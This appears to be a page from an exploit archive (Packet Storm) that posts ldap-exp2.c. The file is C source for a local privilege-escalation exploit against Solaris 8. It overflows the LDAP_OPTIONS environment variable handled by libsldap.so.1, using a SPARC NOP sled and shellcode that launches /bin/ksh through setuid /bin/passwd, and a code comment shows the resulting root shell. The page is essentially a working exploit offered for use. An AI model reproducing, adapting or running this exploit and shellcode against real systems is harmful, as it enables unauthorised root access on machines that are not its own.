exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ldap-exp2.c

ldap-exp2.c
Posted Jul 10, 2003
Authored by Fyodor | Site notlsd.net

Solaris 8 LDAP_OPTIONS local buffer overflow exploit which takes advantage of a bug in libsldap.so.1.

tags | exploit, overflow, local
systems | solaris
SHA-256 | fbf6de6cb08309b916fc1f7834bc383860b579ea95037740cc187c35f913b224

ldap-exp2.c

Change Mirror Download
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>


/* $Id: ldap_exp2.c,v 1.1 2001/06/27 23:01:04 fygrave Exp $
*
* victim% ./lod -s 316 -p 5
* jumping into: ffbefe74 (buf size: 156, soff: 316, stack: ffbefd38)
* # id
* uid=0(root) gid=200(em) egid=3(sys)
* # uname -a
* SunOS victim 5.8 Generic_108528-06 sun4u sparc SUNW,Ultra-60
* # ^D
* victim%
* Thu Jun 28 05:22:38 ICT 2001
* Fyodor <fygrave@tigerteam.net>
*/

#define NOP "\x80\x1c\x40\x11"
#define BUFSIZE 156
#define LOCALBUF 10000
#define NOPS 1964
#define PAD 3
#define SOFF 664

char shellcode[]=

"\x90\x1a\x40\x09" /* xor %o1, %o1, %o0 */
"\x82\x10\x20\x17" /* mov 0x17, %g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"\x20\xbf\xff\xff" /* bn,a 0x108b4 <main+8> */
"\x20\xbf\xff\xff" /* bn,a 0x108b8 <maino> */
"\x7f\xff\xff\xff" /* call 0x108bc <shellcode> */
"\x90\x03\xe0\x30" /* add %o7, 0x30, %o0 */
"\x92\x03\xe0\x28" /* add %o7, 0x28, %o1 */
"\xc0\x2b\xe0\x38" /* clrb [ %o7 + 0x38 ] */
"\xd0\x23\xe0\x28" /* st %o0, [ %o7 + 0x28 ] */
"\xc0\x23\xe0\x2c" /* clr [ %o7 + 0x2c ] */
"\x82\x10\x20\x0b" /* mov 0xb, %g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"\x82\x10\x20\x01" /* mov 1, %g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"\x41\x41\x41\x41" /* AAAA */
"\x41\x41\x41\x41" /* AAAA */
"\x2f\x62\x69\x6e" /* /bin */
"\x2f\x6b\x73\x68" /* /ksh */
"\x41\x57\x68\x6f"; /* junk */

extern char *optarg;

unsigned long get_sp(void) {

__asm__("mov %sp,%i0 \n");

}

int main(int argc, char **argv) {

static char buf[LOCALBUF], *ptr;
unsigned long addr, bufsize, soff, pad;
int i, c;

soff = SOFF;
bufsize = BUFSIZE;
pad = PAD;

while((c = getopt(argc, argv, "s:b:p:h")) !=EOF)
switch(c) {
case 'b':
bufsize = strtoul(optarg,NULL,0);
break;
case 's':
soff = strtoul(optarg,NULL,0);
break;
case 'p':
pad = strtoul(optarg,NULL,0);
break;
case 'h':
default:
fprintf(stderr,"usage: %s [-b buffsize] [-s stackoff] [-p pad]\n",
argv[0]);
exit(1);
}


bzero(buf, sizeof(buf));

strcpy(buf,"LDAP_OPTIONS=");
ptr=buf + strlen(buf);

for(i=0;i<bufsize;i++, ptr++) *ptr='A';

addr = get_sp() + soff;
memcpy(ptr,(char *)&addr, 4);
memcpy(ptr+4,(char *)&addr, 4);
ptr+=8;

for(i=0;i<pad;i++, ptr++) *ptr='A';
for(i=0;i<NOPS;i++, ptr+=4) memcpy(ptr, NOP, 4);
strcat(buf, shellcode);

putenv(buf);
fprintf(stderr,"jumping into: %lx (buf size: %i, soff: %i, stack: %lx)\n",
addr, bufsize, soff, get_sp());

execl("/bin/passwd","lameswd",0);
}

Login or Register to add favorites

File Archive:

August 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    20 Files
  • 2
    Aug 2nd
    4 Files
  • 3
    Aug 3rd
    6 Files
  • 4
    Aug 4th
    55 Files
  • 5
    Aug 5th
    16 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    13 Files
  • 9
    Aug 9th
    13 Files
  • 10
    Aug 10th
    34 Files
  • 11
    Aug 11th
    16 Files
  • 12
    Aug 12th
    5 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    25 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close